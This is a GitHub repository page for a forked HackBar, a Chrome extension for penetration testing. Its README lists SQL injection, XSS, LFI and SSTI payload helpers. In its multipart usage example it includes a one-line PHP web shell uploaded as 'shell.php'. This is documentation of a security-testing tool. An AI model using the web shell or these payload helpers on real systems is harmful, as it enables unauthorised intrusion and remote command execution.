Skip to content
/ hackbar Public
forked from 0140454/hackbar

A Chrome Extension for Penetration Testing

1 star 58 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

bmorelax/hackbar

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

104 Commits

css

css

 
 

fonts

fonts

 
 

images

images

 
 

payloads

payloads

 
 

scripts

scripts

 
 

.gitignore

.gitignore

 
 

README.md

README.md

 
 

devtools.html

devtools.html

 
 

index.html

index.html

 
 

manifest.json

manifest.json

 
 

Repository files navigation

HackBar

HackBar for Chrome.

Available on Chrome Web Store.

Requested Permissions

  • tabs
  • webRequest
  • webRequestBlocking

Features

  • Supported methods

  • Auto Test

    • Common paths (Wordlist from dirsearch included)

  • SQLi

    • Dump all database names (MySQL, PostgreSQL)
    • Dump tables from database (MySQL, PostgreSQL, SQLite)
    • Dump columns from database (MySQL, PostgreSQL, SQLite)
    • Union select statement (MySQL, PostgreSQL, SQLite)
    • Error-based injection statement (MySQL, PostgreSQL)
    • Dump in one shot payload (MySQL)
    • Dump current query payload (MySQL)
    • Space to Inline comment

  • XSS

    • Html encode/decode
    • String.fromCharCode encode/decode

  • LFI

    • PHP wrapper - Base64

  • SSTI

  • Encoding

    • URL encode/decode
    • Base64 encode/decode
    • Hexadecimal encode/decode
    • Unicode encode/decode

  • Hashing

    • MD5
    • SHA1
    • SHA256
    • SHA512

Usage

How to open it?

  1. Open Developer tools (Press F12 or Ctrl + Shift + I)
  2. Switch to HackBar tab
  3. Enjoy it

Shortcuts

Description Default Mac
Load Alt + A Control + A
Split Alt + S Control + S
Execute Alt + X Control + X

Supported enctype

multipart/form-data

After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

We will consider the first line as boundary, and reconstruct a form element to send your request.

Therefore, sent boundary will not be the same as your typed.

application/json

After changing enctype field to application/json, you can put your payload into Body field such as the following:

{
  "username": "admin",
  "password": "admin"
}

In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:

{"username":"admin","password":"admin","4dxnzjzd5mi":"="}

For more details, please visit "Posting JSON with an HTML Form".

Third-party Libraries

Contributor

About

A Chrome Extension for Penetration Testing

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 55.9%
  • HTML 37.2%
  • CSS 6.9%